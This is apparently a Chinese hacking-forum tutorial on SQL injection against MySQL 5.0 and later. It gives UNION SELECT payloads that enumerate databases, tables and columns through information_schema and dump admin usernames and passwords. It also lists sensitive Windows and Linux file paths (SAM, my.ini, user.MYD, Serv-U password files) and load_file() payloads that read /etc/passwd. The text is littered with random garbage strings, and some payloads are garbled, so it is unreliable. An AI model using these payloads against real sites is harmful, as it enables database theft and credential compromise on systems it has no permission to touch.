mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。

  m" `+ S6 i- L; k+ ]+ t
  ]; I, J* y  @, ]
( Y5 ~* s9 v' L0 s) zMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
4 z; l1 B5 V1 ?7 U$ K$ ]: I|SCHEMATA ->存储数据库名的表
. S& v3 i( s* o; c% i|—字段：SCHEMA_NAME ->数据库名称
# d# H+ i9 p* I. K
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
) d! ^5 {3 o) k  D. b, c|—字段：TABLE_NAME ->存储表的表名
& ^1 V" b8 W/ o
|COLUMNS ->存储的字段名表
  x- e6 N7 A1 W( e) @$ ~- f|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
* E/ Y/ ?- l2 G: `; q
" Q/ t1 ~3 x6 u; u2 A#########################################################################
4 o1 o( J! {. X! z' m# F: O: ?, W##
% d- K0 Q7 ^1 F) C
; @9 l  J/ J9 W! w0×001 获取系统信息:

8 g9 ~" D/ I( i9 J, i& hunion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
' `8 y3 T" A$ B. R6 u, F(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
# Q/ P7 O1 }& v: E
/*

@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
* C  Y; N! O# S( c8 x/ ~" u) `$ Hdatabase() 当前数据库名称
" z2 L" G) `* `! {* v0x3c62723e 换行HEX值
& _; X' l4 i* g* H( o
*/
/ W) o, c6 [. G5 ^9 m4 k, a
######################################################################

0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
3 D6 X! N4 E( q1 L+ f1 ainformation_schema.tables where table_schema=0x67617264656e /*

/*
$ a0 V( D) L2 V# T. P. G+ W
0x67617264656e 为当前数据库名

, t1 m; Q1 y" t; ]- Ogroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

2 K3 u3 a. y! X. O*/

######################################################################

. Q  I6 {1 s9 B) N2 z! ]4 e/ {0×003 获取字段
) Y, s, o- C% |4 U! G% U. C
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
  q! |) s5 N: {9 Vinformation_schema.columns where table_name=0x61646d696e and


4 I  L# I+ F' J# f, Z5 Q, [- H0 wtable_schema=0x67617264656e limit 1 /*
+ C! @' o2 a1 a# G. z& A
% b7 o+ z: h+ J: Q/*
/ y0 l, U5 F+ w0 ]
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表

0x67617264656e ->数据库名
( x! z3 V' ~6 `: E0 u0 [
*/
8 `6 I+ k* U( K" Q- T; b; ]% x  a
#####################################################################

0×004 获取数据
* J  o4 }$ Q9 ~$ T
union select 1,2,3
& B! C; a/ V  q6 f: e3 S! ?,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

, a( I2 W! G$ a! ?& H3 ^3 hunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
; T7 O  @  O! D; y(adpassword),6,7,8 from admin

# d; E; C7 l2 j. V6 c% l/*

0x3c62723e 换行符号HEX编码
, l% T& {5 b: u" w; m
/ \* o# G7 F. ^9 U: xgroup_concat 同时获得该字段所有数据

* }! `- ]0 `3 r" T* m# R*/

: z8 C; m8 s% S  v
& r3 D# a: C1 ^: F' X

- X$ T2 ~, K6 {- t6 m
7 a4 w7 }( w2 a' s顺便添加一些mysql注入时非常有用的一些东西

简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
0 x- _0 j5 g: O) a9 Z
1:system_user() 系统用户名
2:user()        用户名
: i9 e4 ^, T, S: C$ L! h: ?- v3:current_user()  当前用户名
& A1 H/ [- W7 t/ ?. Q2 f& c- Y4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
) L& E7 K- \5 H4 c: v7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
* A0 X" t1 [3 A* N! U5 O6 F& d, u/ {' m9@basedir    MYSQL 安装路径
1 p! s  D, K" S6 Y. D10@version_compile_os   操作系统  Windows Server 2003,
3 n8 F' H9 t+ y5 B; T- E0 r收集的一些路径：
* z, m% {/ Y/ VWINDOWS下:
7 M; W, J# n6 I2 K5 Vc:/boot.ini          //查看系统版本
, V. I* X, }3 c% C* ^' Q8 Bc:/windows/php.ini   //php配置信息
/ ~0 j9 v% v& U% Wc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
! U: y3 S: K/ `  qc:/winnt/php.ini
/ V6 [6 Y$ K! ^" f' P, T  tc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
. F, I  J+ z) ^' K& n# vc:\Program Files\Serv-U\ServUDaemon.ini
/ V8 l/ e" G9 [$ i& N: @$ {& Jc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
9 B2 z! q( ^' w) t: T7 j6 Zc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
4 _( S; J& n" R4 ~; tc:\Program Files\RhinoSoft.com\ServUDaemon.exe
* y+ L$ ^7 h; [C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
* D$ w. {( f6 N" Nc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
# x2 T, j; O+ E$ L/ t: j' K

, w( y& l, a( p1 z9 A* I- Bc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
' u/ V1 U& X% ~2 c" S; [d:\APACHE\Apache2\conf\httpd.conf
% E, T/ P. k5 R7 {7 l9 dC:\Program Files\mysql\my.ini
6 T6 B+ l; g6 ~& I9 i& Oc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
) P# t, d7 l& fC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
. K3 P# l8 f9 K& h6 j2 H( ^8 y/usr/local/apache2/conf/httpd.conf
- y3 c/ ]% T1 S# D2 _& h/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
. o+ n& B/ S' C; d6 A4 t% {/usr/local/app/php5/lib/php.ini //PHP相关设置
4 V8 J! Q' Y  X. Q1 ~) Y+ w/etc/sysconfig/iptables //从中得到防火墙规则策略
, N  b) U; p8 _/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
, V( x9 A: V4 _, X2 H/etc/issue
: M9 l$ Q3 u3 A) G6 {/etc/issue.net
+ I- A% U  Z7 f1 E4 H/usr/local/app/php5/lib/php.ini //PHP相关设置
# H- w9 f3 h$ O( K; I# X/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
* r% ^* t# _6 d/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
- N6 h+ i: K2 @& }/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
7 a) F2 H- O+ s6 w: C# `/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
+ E' `3 g# r8 A& G* H/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
; s7 z  i  i3 g1 U! \$ l* ]! r; ], a8 c/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
* r2 s7 ^/ T- y( X' e' f; qreplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

  o9 ]0 {; @* N0 K7 k